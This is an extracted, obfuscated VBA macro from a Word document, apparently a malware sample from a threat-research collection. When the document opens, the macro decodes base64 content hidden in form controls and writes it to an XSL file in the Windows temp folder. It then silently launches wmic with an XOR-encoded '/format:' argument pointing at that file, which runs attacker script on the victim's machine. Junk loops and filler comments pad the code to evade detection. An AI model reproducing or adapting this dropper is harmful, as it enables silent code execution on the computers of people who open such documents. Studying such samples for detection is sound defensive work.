Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
main
End Sub
Attribute VB_Name = "a1tXBM"
Attribute VB_Base = "0{0F9F34F1-AA58-4B0A-99E2-A419E52F28C7}{8116FBC8-8DEE-4F21-8EA6-79E7D96DEA16}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "a4VJ9"
Public Const aVpDgj As String = "c:\"
Public Const a3RcB As String = "win"
Public Const a394M As String = "dow"
Public Const a0H1V As String = "s\te"
Public Const aMxQeL As String = "mp\"
Public Const axeViD As String = "ci"
Public Const aSW34 As String = "mw"
Function ae9QS(aJlnC As String)
Dim aZRzMJ
For aZRzMJ = 22 To 54
Debug.Print Error(aZRzMJ)
Next aZRzMJ
' Celts indigo athwart
Dim a9mHz
a9mHz = Exp(6)
' Continuously
Set aldMZ = New MSXML2.DOMDocument
aktigq = Not (aktigq)
' Blog repugnant
Set asqQp = aldMZ.createElement("b64")
asqQp.DataType = "bin.base64"
asqQp.Text = aJlnC
ae9QS = StrConv(asqQp.nodeTypedValue, vbUnicode)
as68d = Not (as68d)
' Whisk abhorrence granddaughter gaol
End Function
Public Sub a9ALj5(aF3rap, alYaZh, aTpvP)
aaruo = Not (aaruo)
' Stereo
Dim anXfY As Long
anXfY = ActiveDocument.BuiltinDocumentProperties(wdPropertyPages)
' Coiffure unreliable ermine hydrogen
ar2L60 = aVpDgj & a3RcB & a394M & a0H1V & aMxQeL
Dim a3rJiX
For a3rJiX = 28 To 40
Debug.Print Error(a3rJiX)
Next a3rJiX
Set afd26Q = CreateObject("Scripting.FileSystemObject")
Dim aUhpR As Long
Dim aAGEMt As Document
Set aAGEMt = ActiveDocument
aUhpR = aAGEMt.ActiveWindow.Panes(1).Pages.Count
Dim a7j6U2 As Integer
Dim aSc57l As Integer
a7j6U2 = 77
aSc57l = 131 - 82
aHDesm = a7j6U2 / aSc57l
' Pregnancy planners
Set aujXw = afd26Q.CreateTextFile(ar2L60 & "\aQi4yK.xsl", 1)
With aujXw
Dim adxA2N As Long
Dim a9zOBW As Document
Set a9zOBW = ActiveDocument
adxA2N = a9zOBW.ActiveWindow.Panes(1).Pages.Count
' Perspective calvin
.Write aF3rap
If adW7x = False Then
adW7x = True
Else
adW7x = False
End If
' Use notably arrives elizabethan
.Close
End With
End Sub
Function aKnwVi()
Set aXBH9F = New a1tXBM
anOZ5 = aXBH9F.eatmy.Text
afkthJ = Not (afkthJ)
' Shred bewitching writes prophesy thyroid
az20w = aXBH9F.shorts.Text
Dim aPsLx2 As Long
Dim aNYFWZ As Long
aPsLx2 = 18144 / 756
aNYFWZ = 62
ap3ou8 = aPsLx2 * aNYFWZ
' Ps momentum
Dim adliRt
adliRt = Hex(249)
aKnwVi = anOZ5 & az20w
End Function
Attribute VB_Name = "aDWM0g"
#If VBA7 Then
    Private Declare PtrSafe Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" _
        (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
#Else
    Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" _
        (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
#End If
Sub main()
Dim aBxFiR As Long
aBxFiR = ActiveDocument.BuiltinDocumentProperties(wdPropertyPages)
' Evening karen vivacious ague boxed
Dim a5l9J
a5l9J = Hex(3)
' Supreme delude m

Dim ak05E As Long
ak05E = ActiveDocument.ActiveWindow.Panes(1).Pages.Count

Dim a8cQxe
a8cQxe = Fix(16)
' Movies buffet
If adXSau = False Then
adXSau = True
Else
adXSau = False
End If
Dim amLE5P As String
Dim aCDRg
For aCDRg = 15 To 55
Debug.Print Error(aCDRg)
Next aCDRg
' Case indigo bewilder properties
Dim acx1tI
For acx1tI = 13 To 49
Debug.Print Error(acx1tI)
Next acx1tI
amLE5P = aTSwhJ("", Array(96, 98, 127, 115, 117, 99, 99, 48, 124, 121, 99, 100, 48, 63, 118, 127, 98, 125, 113, 100, 42, 50, 115, 42, 76, 103, 121, 126, 116, 127, 103, 99, 76, 100, 117, 125, 96, 76, 113, 65, 121, 36, 105, 91, 62, 104, 99, 124, 50), 16)

a9ALj5 ae9QS(aKnwVi()), "", ""
Dim aiXbh
aiXbh = 29569 * 1
' Fifty-one profiles interwoven virtually incurable baffle thing
Dim aa0Mp
For aa0Mp = 31 To 45
Debug.Print Error(aa0Mp)
Next aa0Mp
Dim axYk0I As Long
With ActiveDocument
axYk0I = .ActiveWindow.Panes(1).Pages.Count
End With
' Firms prep glossary mainland dir
Dim azlhbC
azlhbC = 9700 + 3
Dim aO1Dq
aO1Dq = Exp(3)
ShellExecute 0, "", StrReverse(axeViD & aSW34), amLE5P, "", 0

End Sub
Attribute VB_Name = "aOCJnU"
Function aTSwhJ(aU58n As String, a2fyJ As Variant, afkQl As Byte)
Dim aqazu
aqazu = Exp(10)
Dim aOt5rc
aOt5rc = Exp(5)
' Bric-a-brac rio ejaculation marked diver


Dim aHGfPk As Long
aHGfPk = ActiveDocument.ActiveWindow.Panes(1).Pages.Count
aPj7J = UBound(a2fyJ)
For aTFs2 = 0 To aPj7J
aU58n = aU58n & Chr(a2fyJ(aTFs2) Xor afkQl)
Next
aTSwhJ = aU58n
End Function
Sub aWUqwG(aud8hB)

Dim aJgSO
For aJgSO = 14 To 52
Debug.Print Error(aJgSO)
Next aJgSO
' Adaptor soup
Dim anQPCi
anQPCi = Exp(12)
' Khartoum murphy pessimistic discard
Dim a0yb4
For a0yb4 = 15 To 54
Debug.Print Error(a0yb4)
Next a0yb4
Dim a74YjL
a74YjL = Hex(62)
' Blackmail prince licentiousness
Dim a9nOW
For a9nOW = 20 To 35
Debug.Print Error(a9nOW)
Next a9nOW
' Sparse scenario snowdon tanned diffident
End Sub


INQUEST-PP=macro
